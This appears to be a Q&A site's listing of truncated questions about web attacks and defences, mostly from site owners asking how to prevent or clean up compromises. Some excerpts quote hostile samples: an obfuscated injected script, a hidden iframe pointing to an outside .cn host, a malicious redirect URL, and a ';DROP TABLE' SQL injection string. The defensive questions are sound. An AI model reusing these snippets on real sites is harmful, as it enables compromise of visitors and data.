Protection from Format String Vulnerability
What exactly is a "Format String Vulnerability" in a Windows System, how does it work, and how can I protect against it? ...
attack
client's website was attacked, eeek!
Well, I guess this day had to come. My client's website has been compromised and blacklisted by Google. When you load the main page this javascript gets automatically added to the bottom of the document: <script type="text/javascript">var str='google-analytics.com';var str2='6b756c6b61726e696f6f37312e636f6d';str4='php';var str3='if';st...
C# MVC: What is a good way to prevent Denial Of Service (DOS) attacks on ASP.NET sites?
I'm looking for a good and inexpensive way to prevent denial of service attacks on my ASP.NET MVC site. I've been thinking about a solution that intercepts the HttpHandler and then counts requests in the Cache object, with the key being something like "RequestCount_[IpAddressOfRequestClient]" but that seems like it would generate a cra...
iframe/script attack to website
I faced a website attack problem that some malicious javascript code added to all pages in my webiste. Recently I faced another problem that my website is attacked with the following "iframe" tag. iframe src="http://shopmovielife.cn:8080/index.php" width=127 height=167 style="visibility: hidden" Even if I remove this tag, the index ...
How to prevent code injection attacks in PHP?
I am abot confusing, there are so many functions in PHP, and some using this, some using that. Some people use: htmlspecialchars(), htmlentities(), strip_tags() etc Which is the correct one and what do you guys usually use? Is this correct (advise me a better one, if any): $var = mysql_real_escape_string(htmlentities($_POST['username'...
Common Website Attack Methods, Detection, and Recovery
I've seen a lot of questions here about specific types of attacks against websites, including SQL injection, denial-of-service, and cross-site scripting. I would like to get a list of the common types of attacks against web sites/services, how to prevent them, how to know if you've been attacked, and how to recover from an attack, all...
I'm being attacked - what can I do?
Someone is putting this code onto my aspx page. What are they doing? How are they doing it? How do I stop them? It's on a shared hosting server. It's on an aspx content page which has a master page and is after the </asp:content> tag... <div style="display:none">qzfmjsdbknmrmlkszrrcehikeapphqq</div> <div style="display:none">o...
Reflection attacks in Auth protocol
Hi all, I have come across a theory on Auth protocol hacking vulnerability which can be found in http://www.owasp.org/index.php/Reflection_attack_in_an_auth_protocol. I understand how this vulnerability causes problems in exchanging the messages and how to bypass validation to become a logged-in and to be a valid user. The following co...
How do I avoid reflection injection attacks in PHP?
I'm writing a class that allows you to bridge HTTP requests with class instances using JSON for data, without any implementation in the class you're bridging to. Basically this is how it works: // This is just an ordinary class. $service = new WeatherService(); $jhi = new JsonHttpInterface($service); $jhi->exec(); The JsonHttpInterfa...
how the code attack google works?
according to McAfee “Aurora” Exploit In Google Attack Now Public, and the exploit code referred should be here, any one can give a more detailed explanation how it works? ...
Can someone explain last year's reddit exploit to me?
Last year a user managed to inject arbitrary javascript into reddit's markdown syntax. Can someone explain how this was done and how I can test whether my site is similarly vulnerable? ...
Ruby on Rails Mysterious Javascript Alert box with cookie information
I have a problem in a Ruby on Rails app that I am working on. I have been working on the app for months and I have never had this problem before and after a bit of Google searches I think that somehow someone is trying to steal cookies with javascript. When I click on the link I get an alert box titled "the page at www.napkinboard.com s...
Does using the converting input from HTML forms into htmlentities protect attacks invoving JavaScript insertion?
Hi everyone, I was wondering if converting POST input from an HTML form into html entities, (via the PHP function htmlentities() or using the FILTER_SANITIZE_SPECIAL_CHARS constant in tandem with the filter_input() PHP function ), will help defend against any attacks where a user attempts to insert any JavaScript code inside the form fi...
Meet-in-the-Middle Atack on an NTRU Private key
Hello everyone. I was wondering if anyone could tell me how to represent the enumeration of vectors of privite key f in a Meet-In-the-Middle Attack on an NTRU Private key. I can not understand the example, given here http://securityinnovation.com/cryptolab/pdf/NTRUTech004v2.pdf I'll be very thankful if anyone could show an example in det...
PHP: I got hacked...
I just checked my site it suddenly jumps me to this site: xxxp://www1.re*******3.net/?p=p52dcWpkbG6HjsbIo216h3de0KCfaFbVoKDb2YmHWJjOxaCbkXp%2FWqyopHaYXsiaY2eRaGNpnFPVpJHaotahiaJ0WKrO1c%2Beb1qfnaSZdV%2FXlsndblaWpG9plmGQYWCcW5eakWppWKjKx6ChpqipbmdjpKjEjtDOoKOhY56n1pLWn1%2FZodXN02BdpqmikpVwZWpxZGxpcV%2FVoJajYmJkZ2hwlGGXaVbJkKC0q1eum5qimZxx...
What is ClixSmart+ServiceMonitor from my IIS log?
(Cross post from serverfault) Hi, Our IIS6 log (W3SVC1) is showing entries with suffix ClixSmart+ServiceMonitor 200 0 0. There are over 10 of them per second and it lasts about 20 seconds when happened. Is our server being hacked? TIA ...
Is this query safe from sql injection?
The script is in PHP and as DB I use MySQL. Here is the script itself. $unsafe_variable = $_GET["user-input"]; $sql=sprintf("INSERT INTO table (column) VALUES('%s')",$unsafe_variable); mysql_query($sql); Some people say that if user assigns ;DROP TABLE blah; string to the variable $unsafe_variable it deletes the table. But I tried th...
Is it possible to distinguish from "good" http requests and DoS attacks?
How could I know that a lot of requests in a short period of time come from a DoS attack and not from normal browser requests? ...
how to avoid bot attacks on form
i have these forms: https://www.mychabad.org/templates/articlecco.asp?aid=1188756&jewish=General-Contributions.htm&lang=en&site=chabaduc.org https://www.mychabad.org/templates/articlecco.asp?AID=1189379 https://www.mychabad.org/templates/articlecco.asp?aid=1189287&jewish=Shabbat-Holiday-Sponsorships.htm&lang=en&...
Introduction to various Attack types
I just read a paper on preventing buffer overflow attacks and in that vein, I am looking for a paper or set of papers that will explain the various types of attacks that programmers and sysadmins have to worry about. Can anyone help? even a keywords to search ACM under. ...